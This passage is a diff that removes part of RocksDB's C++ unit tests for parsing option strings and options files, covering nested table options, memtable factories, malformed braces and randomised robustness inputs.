-      "write_buffer_size=18g;prefix_extractor=capped:8;"
-      "arena_block_size=19G",
-      &new_cf_opt));
-
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 18 * giga);
-  ASSERT_EQ(new_cf_opt.arena_block_size, 19 * giga);
-  ASSERT_TRUE(new_cf_opt.prefix_extractor.get() != nullptr);
-  std::string prefix_name(new_cf_opt.prefix_extractor->Name());
-  ASSERT_EQ(prefix_name, "rocksdb.CappedPrefix.8");
-
-  // Units (t)
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=20t;arena_block_size=21T", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 20 * tera);
-  ASSERT_EQ(new_cf_opt.arena_block_size, 21 * tera);
-
-  // Nested block based table options
-  // Empty
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=10;max_write_buffer_number=16;"
-            "block_based_table_factory={};arena_block_size=1024",
-            &new_cf_opt));
-  ASSERT_TRUE(new_cf_opt.table_factory != nullptr);
-  // Non-empty
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=10;max_write_buffer_number=16;"
-            "block_based_table_factory={block_cache=1M;block_size=4;};"
-            "arena_block_size=1024",
-            &new_cf_opt));
-  ASSERT_TRUE(new_cf_opt.table_factory != nullptr);
-  // Last one
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=10;max_write_buffer_number=16;"
-            "block_based_table_factory={block_cache=1M;block_size=4;}",
-            &new_cf_opt));
-  ASSERT_TRUE(new_cf_opt.table_factory != nullptr);
-  // Mismatch curly braces
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=10;max_write_buffer_number=16;"
-             "block_based_table_factory={{{block_size=4;};"
-             "arena_block_size=1024",
-             &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  // Unexpected chars after closing curly brace
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=10;max_write_buffer_number=16;"
-             "block_based_table_factory={block_size=4;}};"
-             "arena_block_size=1024",
-             &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=10;max_write_buffer_number=16;"
-             "block_based_table_factory={block_size=4;}xdfa;"
-             "arena_block_size=1024",
-             &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=10;max_write_buffer_number=16;"
-             "block_based_table_factory={block_size=4;}xdfa",
-             &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  // Invalid block based table option
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=10;max_write_buffer_number=16;"
-             "block_based_table_factory={xx_block_size=4;}",
-             &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-           "optimize_filters_for_hits=true",
-           &new_cf_opt));
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "optimize_filters_for_hits=false",
-            &new_cf_opt));
-
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-              "optimize_filters_for_hits=junk",
-              &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  // Nested plain table options
-  // Empty
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=10;max_write_buffer_number=16;"
-            "plain_table_factory={};arena_block_size=1024",
-            &new_cf_opt));
-  ASSERT_TRUE(new_cf_opt.table_factory != nullptr);
-  ASSERT_EQ(std::string(new_cf_opt.table_factory->Name()), "PlainTable");
-  // Non-empty
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=10;max_write_buffer_number=16;"
-            "plain_table_factory={user_key_len=66;bloom_bits_per_key=20;};"
-            "arena_block_size=1024",
-            &new_cf_opt));
-  ASSERT_TRUE(new_cf_opt.table_factory != nullptr);
-  ASSERT_EQ(std::string(new_cf_opt.table_factory->Name()), "PlainTable");
-
-  // memtable factory
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=10;max_write_buffer_number=16;"
-            "memtable=skip_list:10;arena_block_size=1024",
-            &new_cf_opt));
-  ASSERT_TRUE(new_cf_opt.memtable_factory != nullptr);
-  ASSERT_EQ(std::string(new_cf_opt.memtable_factory->Name()), "SkipListFactory");
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // GetBlockBasedTableOptionsFromString is not supported
-TEST_F(OptionsTest, GetBlockBasedTableOptionsFromString) {
-  BlockBasedTableOptions table_opt;
-  BlockBasedTableOptions new_opt;
-  // make sure default values are overwritten by something else
-  ASSERT_OK(GetBlockBasedTableOptionsFromString(table_opt,
-            "cache_index_and_filter_blocks=1;index_type=kHashSearch;"
-            "checksum=kxxHash;hash_index_allow_collision=1;no_block_cache=1;"
-            "block_cache=1M;block_cache_compressed=1k;block_size=1024;"
-            "block_size_deviation=8;block_restart_interval=4;"
-            "filter_policy=bloomfilter:4:true;whole_key_filtering=1;",
-            &new_opt));
-  ASSERT_TRUE(new_opt.cache_index_and_filter_blocks);
-  ASSERT_EQ(new_opt.index_type, BlockBasedTableOptions::kHashSearch);
-  ASSERT_EQ(new_opt.checksum, ChecksumType::kxxHash);
-  ASSERT_TRUE(new_opt.hash_index_allow_collision);
-  ASSERT_TRUE(new_opt.no_block_cache);
-  ASSERT_TRUE(new_opt.block_cache != nullptr);
-  ASSERT_EQ(new_opt.block_cache->GetCapacity(), 1024UL*1024UL);
-  ASSERT_TRUE(new_opt.block_cache_compressed != nullptr);
-  ASSERT_EQ(new_opt.block_cache_compressed->GetCapacity(), 1024UL);
-  ASSERT_EQ(new_opt.block_size, 1024UL);
-  ASSERT_EQ(new_opt.block_size_deviation, 8);
-  ASSERT_EQ(new_opt.block_restart_interval, 4);
-  ASSERT_TRUE(new_opt.filter_policy != nullptr);
-
-  // unknown option
-  ASSERT_NOK(GetBlockBasedTableOptionsFromString(table_opt,
-             "cache_index_and_filter_blocks=1;index_type=kBinarySearch;"
-             "bad_option=1",
-             &new_opt));
-  ASSERT_EQ(table_opt.cache_index_and_filter_blocks,
-            new_opt.cache_index_and_filter_blocks);
-  ASSERT_EQ(table_opt.index_type, new_opt.index_type);
-
-  // unrecognized index type
-  ASSERT_NOK(GetBlockBasedTableOptionsFromString(table_opt,
-             "cache_index_and_filter_blocks=1;index_type=kBinarySearchXX",
-             &new_opt));
-  ASSERT_EQ(table_opt.cache_index_and_filter_blocks,
-            new_opt.cache_index_and_filter_blocks);
-  ASSERT_EQ(table_opt.index_type, new_opt.index_type);
-
-  // unrecognized checksum type
-  ASSERT_NOK(GetBlockBasedTableOptionsFromString(table_opt,
-             "cache_index_and_filter_blocks=1;checksum=kxxHashXX",
-             &new_opt));
-  ASSERT_EQ(table_opt.cache_index_and_filter_blocks,
-            new_opt.cache_index_and_filter_blocks);
-  ASSERT_EQ(table_opt.index_type, new_opt.index_type);
-
-  // unrecognized filter policy name
-  ASSERT_NOK(GetBlockBasedTableOptionsFromString(table_opt,
-             "cache_index_and_filter_blocks=1;"
-             "filter_policy=bloomfilterxx:4:true",
-             &new_opt));
-  ASSERT_EQ(table_opt.cache_index_and_filter_blocks,
-            new_opt.cache_index_and_filter_blocks);
-  ASSERT_EQ(table_opt.filter_policy, new_opt.filter_policy);
-
-  // unrecognized filter policy config
-  ASSERT_NOK(GetBlockBasedTableOptionsFromString(table_opt,
-             "cache_index_and_filter_blocks=1;"
-             "filter_policy=bloomfilter:4",
-             &new_opt));
-  ASSERT_EQ(table_opt.cache_index_and_filter_blocks,
-            new_opt.cache_index_and_filter_blocks);
-  ASSERT_EQ(table_opt.filter_policy, new_opt.filter_policy);
-}
-#endif  // !ROCKSDB_LITE
-
-
-#ifndef ROCKSDB_LITE  // GetPlainTableOptionsFromString is not supported
-TEST_F(OptionsTest, GetPlainTableOptionsFromString) {
-  PlainTableOptions table_opt;
-  PlainTableOptions new_opt;
-  // make sure default values are overwritten by something else
-  ASSERT_OK(GetPlainTableOptionsFromString(table_opt,
-            "user_key_len=66;bloom_bits_per_key=20;hash_table_ratio=0.5;"
-            "index_sparseness=8;huge_page_tlb_size=4;encoding_type=kPrefix;"
-            "full_scan_mode=true;store_index_in_file=true",
-            &new_opt));
-  ASSERT_EQ(new_opt.user_key_len, 66);
-  ASSERT_EQ(new_opt.bloom_bits_per_key, 20);
-  ASSERT_EQ(new_opt.hash_table_ratio, 0.5);
-  ASSERT_EQ(new_opt.index_sparseness, 8);
-  ASSERT_EQ(new_opt.huge_page_tlb_size, 4);
-  ASSERT_EQ(new_opt.encoding_type, EncodingType::kPrefix);
-  ASSERT_TRUE(new_opt.full_scan_mode);
-  ASSERT_TRUE(new_opt.store_index_in_file);
-
-  // unknown option
-  ASSERT_NOK(GetPlainTableOptionsFromString(table_opt,
-             "user_key_len=66;bloom_bits_per_key=20;hash_table_ratio=0.5;"
-             "bad_option=1",
-             &new_opt));
-
-  // unrecognized EncodingType
-  ASSERT_NOK(GetPlainTableOptionsFromString(table_opt,
-             "user_key_len=66;bloom_bits_per_key=20;hash_table_ratio=0.5;"
-             "encoding_type=kPrefixXX",
-             &new_opt));
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // GetMemTableRepFactoryFromString is not supported
-TEST_F(OptionsTest, GetMemTableRepFactoryFromString) {
-  std::unique_ptr<MemTableRepFactory> new_mem_factory = nullptr;
-
-  ASSERT_OK(GetMemTableRepFactoryFromString("skip_list", &new_mem_factory));
-  ASSERT_OK(GetMemTableRepFactoryFromString("skip_list:16", &new_mem_factory));
-  ASSERT_EQ(std::string(new_mem_factory->Name()), "SkipListFactory");
-  ASSERT_NOK(GetMemTableRepFactoryFromString("skip_list:16:invalid_opt",
-                                             &new_mem_factory));
-
-  ASSERT_OK(GetMemTableRepFactoryFromString("prefix_hash", &new_mem_factory));
-  ASSERT_OK(GetMemTableRepFactoryFromString("prefix_hash:1000",
-                                            &new_mem_factory));
-  ASSERT_EQ(std::string(new_mem_factory->Name()), "HashSkipListRepFactory");
-  ASSERT_NOK(GetMemTableRepFactoryFromString("prefix_hash:1000:invalid_opt",
-                                             &new_mem_factory));
-
-  ASSERT_OK(GetMemTableRepFactoryFromString("hash_linkedlist",
-                                            &new_mem_factory));
-  ASSERT_OK(GetMemTableRepFactoryFromString("hash_linkedlist:1000",
-                                            &new_mem_factory));
-  ASSERT_EQ(std::string(new_mem_factory->Name()), "HashLinkListRepFactory");
-  ASSERT_NOK(GetMemTableRepFactoryFromString("hash_linkedlist:1000:invalid_opt",
-                                             &new_mem_factory));
-
-  ASSERT_OK(GetMemTableRepFactoryFromString("vector", &new_mem_factory));
-  ASSERT_OK(GetMemTableRepFactoryFromString("vector:1024", &new_mem_factory));
-  ASSERT_EQ(std::string(new_mem_factory->Name()), "VectorRepFactory");
-  ASSERT_NOK(GetMemTableRepFactoryFromString("vector:1024:invalid_opt",
-                                             &new_mem_factory));
-
-  ASSERT_NOK(GetMemTableRepFactoryFromString("cuckoo", &new_mem_factory));
-  ASSERT_OK(GetMemTableRepFactoryFromString("cuckoo:1024", &new_mem_factory));
-  ASSERT_EQ(std::string(new_mem_factory->Name()), "HashCuckooRepFactory");
-
-  ASSERT_NOK(GetMemTableRepFactoryFromString("bad_factory", &new_mem_factory));
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // GetOptionsFromString is not supported in RocksDB Lite
-TEST_F(OptionsTest, GetOptionsFromStringTest) {
-  Options base_options, new_options;
-  base_options.write_buffer_size = 20;
-  base_options.min_write_buffer_number_to_merge = 15;
-  BlockBasedTableOptions block_based_table_options;
-  block_based_table_options.cache_index_and_filter_blocks = true;
-  base_options.table_factory.reset(
-      NewBlockBasedTableFactory(block_based_table_options));
-  ASSERT_OK(GetOptionsFromString(
-      base_options,
-      "write_buffer_size=10;max_write_buffer_number=16;"
-      "block_based_table_factory={block_cache=1M;block_size=4;};"
-      "compression_opts=4:5:6;create_if_missing=true;max_open_files=1;"
-      "rate_limiter_bytes_per_sec=1024",
-      &new_options));
-
-  ASSERT_EQ(new_options.compression_opts.window_bits, 4);
-  ASSERT_EQ(new_options.compression_opts.level, 5);
-  ASSERT_EQ(new_options.compression_opts.strategy, 6);
-  ASSERT_EQ(new_options.compression_opts.max_dict_bytes, 0);
-  ASSERT_EQ(new_options.bottommost_compression, kDisableCompressionOption);
-  ASSERT_EQ(new_options.write_buffer_size, 10U);
-  ASSERT_EQ(new_options.max_write_buffer_number, 16);
-  BlockBasedTableOptions new_block_based_table_options =
-      dynamic_cast<BlockBasedTableFactory*>(new_options.table_factory.get())
-          ->table_options();
-  ASSERT_EQ(new_block_based_table_options.block_cache->GetCapacity(), 1U << 20);
-  ASSERT_EQ(new_block_based_table_options.block_size, 4U);
-  // don't overwrite block based table options
-  ASSERT_TRUE(new_block_based_table_options.cache_index_and_filter_blocks);
-
-  ASSERT_EQ(new_options.create_if_missing, true);
-  ASSERT_EQ(new_options.max_open_files, 1);
-  ASSERT_TRUE(new_options.rate_limiter.get() != nullptr);
-}
-
-TEST_F(OptionsTest, DBOptionsSerialization) {
-  Options base_options, new_options;
-  Random rnd(301);
-
-  // Phase 1: Make big change in base_options
-  test::RandomInitDBOptions(&base_options, &rnd);
-
-  // Phase 2: obtain a string from base_option
-  std::string base_options_file_content;
-  ASSERT_OK(GetStringFromDBOptions(&base_options_file_content, base_options));
-
-  // Phase 3: Set new_options from the derived string and expect
-  //          new_options == base_options
-  ASSERT_OK(GetDBOptionsFromString(DBOptions(), base_options_file_content,
-                                   &new_options));
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(base_options, new_options));
-}
-
-TEST_F(OptionsTest, ColumnFamilyOptionsSerialization) {
-  ColumnFamilyOptions base_opt, new_opt;
-  Random rnd(302);
-  // Phase 1: randomly assign base_opt
-  // custom type options
-  test::RandomInitCFOptions(&base_opt, &rnd);
-
-  // Phase 2: obtain a string from base_opt
-  std::string base_options_file_content;
-  ASSERT_OK(
-      GetStringFromColumnFamilyOptions(&base_options_file_content, base_opt));
-
-  // Phase 3: Set new_opt from the derived string and expect
-  //          new_opt == base_opt
-  ASSERT_OK(GetColumnFamilyOptionsFromString(
-      ColumnFamilyOptions(), base_options_file_content, &new_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_opt, new_opt));
-  if (base_opt.compaction_filter) {
-    delete base_opt.compaction_filter;
-  }
-}
-
-#endif  // !ROCKSDB_LITE
-
-Status StringToMap(
-    const std::string& opts_str,
-    std::unordered_map<std::string, std::string>* opts_map);
-
-#ifndef ROCKSDB_LITE  // StringToMap is not supported in ROCKSDB_LITE
-TEST_F(OptionsTest, StringToMapTest) {
-  std::unordered_map<std::string, std::string> opts_map;
-  // Regular options
-  ASSERT_OK(StringToMap("k1=v1;k2=v2;k3=v3", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "v2");
-  ASSERT_EQ(opts_map["k3"], "v3");
-  // Value with '='
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1==v1;k2=v2=;", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "=v1");
-  ASSERT_EQ(opts_map["k2"], "v2=");
-  // Overwrriten option
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k1=v2;k3=v3", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v2");
-  ASSERT_EQ(opts_map["k3"], "v3");
-  // Empty value
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2=;k3=v3;k4=", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_TRUE(opts_map.find("k2") != opts_map.end());
-  ASSERT_EQ(opts_map["k2"], "");
-  ASSERT_EQ(opts_map["k3"], "v3");
-  ASSERT_TRUE(opts_map.find("k4") != opts_map.end());
-  ASSERT_EQ(opts_map["k4"], "");
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2=;k3=v3;k4=   ", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_TRUE(opts_map.find("k2") != opts_map.end());
-  ASSERT_EQ(opts_map["k2"], "");
-  ASSERT_EQ(opts_map["k3"], "v3");
-  ASSERT_TRUE(opts_map.find("k4") != opts_map.end());
-  ASSERT_EQ(opts_map["k4"], "");
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2=;k3=", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_TRUE(opts_map.find("k2") != opts_map.end());
-  ASSERT_EQ(opts_map["k2"], "");
-  ASSERT_TRUE(opts_map.find("k3") != opts_map.end());
-  ASSERT_EQ(opts_map["k3"], "");
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2=;k3=;", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_TRUE(opts_map.find("k2") != opts_map.end());
-  ASSERT_EQ(opts_map["k2"], "");
-  ASSERT_TRUE(opts_map.find("k3") != opts_map.end());
-  ASSERT_EQ(opts_map["k3"], "");
-  // Regular nested options
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2={nk1=nv1;nk2=nv2};k3=v3", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "nk1=nv1;nk2=nv2");
-  ASSERT_EQ(opts_map["k3"], "v3");
-  // Multi-level nested options
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2={nk1=nv1;nk2={nnk1=nnk2}};"
-                        "k3={nk1={nnk1={nnnk1=nnnv1;nnnk2;nnnv2}}};k4=v4",
-                        &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "nk1=nv1;nk2={nnk1=nnk2}");
-  ASSERT_EQ(opts_map["k3"], "nk1={nnk1={nnnk1=nnnv1;nnnk2;nnnv2}}");
-  ASSERT_EQ(opts_map["k4"], "v4");
-  // Garbage inside curly braces
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2={dfad=};k3={=};k4=v4",
-                        &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "dfad=");
-  ASSERT_EQ(opts_map["k3"], "=");
-  ASSERT_EQ(opts_map["k4"], "v4");
-  // Empty nested options
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2={};", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "");
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2={{{{}}}{}{}};", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "{{{}}}{}{}");
-  // With random spaces
-  opts_map.clear();
-  ASSERT_OK(StringToMap("  k1 =  v1 ; k2= {nk1=nv1; nk2={nnk1=nnk2}}  ; "
-                        "k3={  {   } }; k4= v4  ",
-                        &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "nk1=nv1; nk2={nnk1=nnk2}");
-  ASSERT_EQ(opts_map["k3"], "{   }");
-  ASSERT_EQ(opts_map["k4"], "v4");
-
-  // Empty key
-  ASSERT_NOK(StringToMap("k1=v1;k2=v2;=", &opts_map));
-  ASSERT_NOK(StringToMap("=v1;k2=v2", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2v2;", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2=v2;fadfa", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2=v2;;", &opts_map));
-  // Mismatch curly braces
-  ASSERT_NOK(StringToMap("k1=v1;k2={;k3=v3", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{};k3=v3", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={}};k3=v3", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{}{}}};k3=v3", &opts_map));
-  // However this is valid!
-  opts_map.clear();
-  ASSERT_OK(StringToMap("k1=v1;k2=};k3=v3", &opts_map));
-  ASSERT_EQ(opts_map["k1"], "v1");
-  ASSERT_EQ(opts_map["k2"], "}");
-  ASSERT_EQ(opts_map["k3"], "v3");
-
-  // Invalid chars after closing curly brace
-  ASSERT_NOK(StringToMap("k1=v1;k2={{}}{};k3=v3", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{}}cfda;k3=v3", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{}}  cfda;k3=v3", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{}}  cfda", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{}}{}", &opts_map));
-  ASSERT_NOK(StringToMap("k1=v1;k2={{dfdl}adfa}{}", &opts_map));
-}
-#endif  // ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // StringToMap is not supported in ROCKSDB_LITE
-TEST_F(OptionsTest, StringToMapRandomTest) {
-  std::unordered_map<std::string, std::string> opts_map;
-  // Make sure segfault is not hit by semi-random strings
-
-  std::vector<std::string> bases = {
-      "a={aa={};tt={xxx={}}};c=defff",
-      "a={aa={};tt={xxx={}}};c=defff;d={{}yxx{}3{xx}}",
-      "abc={{}{}{}{{{}}}{{}{}{}{}{}{}{}"};
-
-  for (std::string base : bases) {
-    for (int rand_seed = 301; rand_seed < 401; rand_seed++) {
-      Random rnd(rand_seed);
-      for (int attempt = 0; attempt < 10; attempt++) {
-        std::string str = base;
-        // Replace random position to space
-        size_t pos = static_cast<size_t>(
-            rnd.Uniform(static_cast<int>(base.size())));
-        str[pos] = ' ';
-        Status s = StringToMap(str, &opts_map);
-        ASSERT_TRUE(s.ok() || s.IsInvalidArgument());
-        opts_map.clear();
-      }
-    }
-  }
-
-  // Random Construct a string
-  std::vector<char> chars = {'{', '}', ' ', '=', ';', 'c'};
-  for (int rand_seed = 301; rand_seed < 1301; rand_seed++) {
-    Random rnd(rand_seed);
-    int len = rnd.Uniform(30);
-    std::string str = "";
-    for (int attempt = 0; attempt < len; attempt++) {
-      // Add a random character
-      size_t pos = static_cast<size_t>(
-          rnd.Uniform(static_cast<int>(chars.size())));
-      str.append(1, chars[pos]);
-    }
-    Status s = StringToMap(str, &opts_map);
-    ASSERT_TRUE(s.ok() || s.IsInvalidArgument());
-    s = StringToMap("name=" + str, &opts_map);
-    ASSERT_TRUE(s.ok() || s.IsInvalidArgument());
-    opts_map.clear();
-  }
-}
-
-TEST_F(OptionsTest, GetStringFromCompressionType) {
-  std::string res;
-
-  ASSERT_OK(GetStringFromCompressionType(&res, kNoCompression));
-  ASSERT_EQ(res, "kNoCompression");
-
-  ASSERT_OK(GetStringFromCompressionType(&res, kSnappyCompression));
-  ASSERT_EQ(res, "kSnappyCompression");
-
-  ASSERT_OK(GetStringFromCompressionType(&res, kDisableCompressionOption));
-  ASSERT_EQ(res, "kDisableCompressionOption");
-
-  ASSERT_OK(GetStringFromCompressionType(&res, kLZ4Compression));
-  ASSERT_EQ(res, "kLZ4Compression");
-
-  ASSERT_OK(GetStringFromCompressionType(&res, kZlibCompression));
-  ASSERT_EQ(res, "kZlibCompression");
-
-  ASSERT_NOK(
-      GetStringFromCompressionType(&res, static_cast<CompressionType>(-10)));
-}
-#endif  // !ROCKSDB_LITE
-
-TEST_F(OptionsTest, ConvertOptionsTest) {
-  LevelDBOptions leveldb_opt;
-  Options converted_opt = ConvertOptions(leveldb_opt);
-
-  ASSERT_EQ(converted_opt.create_if_missing, leveldb_opt.create_if_missing);
-  ASSERT_EQ(converted_opt.error_if_exists, leveldb_opt.error_if_exists);
-  ASSERT_EQ(converted_opt.paranoid_checks, leveldb_opt.paranoid_checks);
-  ASSERT_EQ(converted_opt.env, leveldb_opt.env);
-  ASSERT_EQ(converted_opt.info_log.get(), leveldb_opt.info_log);
-  ASSERT_EQ(converted_opt.write_buffer_size, leveldb_opt.write_buffer_size);
-  ASSERT_EQ(converted_opt.max_open_files, leveldb_opt.max_open_files);
-  ASSERT_EQ(converted_opt.compression, leveldb_opt.compression);
-
-  std::shared_ptr<TableFactory> tb_guard = converted_opt.table_factory;
-  BlockBasedTableFactory* table_factory =
-      dynamic_cast<BlockBasedTableFactory*>(converted_opt.table_factory.get());
-
-  ASSERT_TRUE(table_factory != nullptr);
-
-  const BlockBasedTableOptions table_opt = table_factory->table_options();
-
-  ASSERT_EQ(table_opt.block_cache->GetCapacity(), 8UL << 20);
-  ASSERT_EQ(table_opt.block_size, leveldb_opt.block_size);
-  ASSERT_EQ(table_opt.block_restart_interval,
-            leveldb_opt.block_restart_interval);
-  ASSERT_EQ(table_opt.filter_policy.get(), leveldb_opt.filter_policy);
-}
-
-#ifndef ROCKSDB_LITE
-class OptionsParserTest : public testing::Test {
- public:
-  OptionsParserTest() { env_.reset(new test::StringEnv(Env::Default())); }
-
- protected:
-  std::unique_ptr<test::StringEnv> env_;
-};
-
-TEST_F(OptionsParserTest, Comment) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[ DBOptions ]\n"
-      "  # note that we don't support space around \"=\"\n"
-      "  max_open_files=12345;\n"
-      "  max_background_flushes=301  # comment after a statement is fine\n"
-      "  # max_background_flushes=1000  # this line would be ignored\n"
-      "  # max_background_compactions=2000 # so does this one\n"
-      "  max_total_wal_size=1024  # keep_log_file_num=1000\n"
-      "[CFOptions   \"default\"]  # column family must be specified\n"
-      "                     # in the correct order\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_OK(parser.Parse(kTestFileName, env_.get()));
-
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(*parser.db_opt(), db_opt));
-  ASSERT_EQ(parser.NumColumnFamilies(), 1U);
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(
-      *parser.GetCFOptions("default"), cf_opt));
-}
-
-TEST_F(OptionsParserTest, ExtraSpace) {
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[      Version   ]\n"
-      "  rocksdb_version     = 3.14.0      \n"
-      "  options_file_version=1   # some comment\n"
-      "[DBOptions  ]  # some comment\n"
-      "max_open_files=12345   \n"
-      "    max_background_flushes   =    301   \n"
-      " max_total_wal_size     =   1024  # keep_log_file_num=1000\n"
-      "        [CFOptions      \"default\"     ]\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_OK(parser.Parse(kTestFileName, env_.get()));
-}
-
-TEST_F(OptionsParserTest, MissingDBOptions) {
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[CFOptions \"default\"]\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_NOK(parser.Parse(kTestFileName, env_.get()));
-}
-
-TEST_F(OptionsParserTest, DoubleDBOptions) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[DBOptions]\n"
-      "  max_open_files=12345\n"
-      "  max_background_flushes=301\n"
-      "  max_total_wal_size=1024  # keep_log_file_num=1000\n"
-      "[DBOptions]\n"
-      "[CFOptions \"default\"]\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_NOK(parser.Parse(kTestFileName, env_.get()));
-}
-
-TEST_F(OptionsParserTest, NoDefaultCFOptions) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string options_file_content =
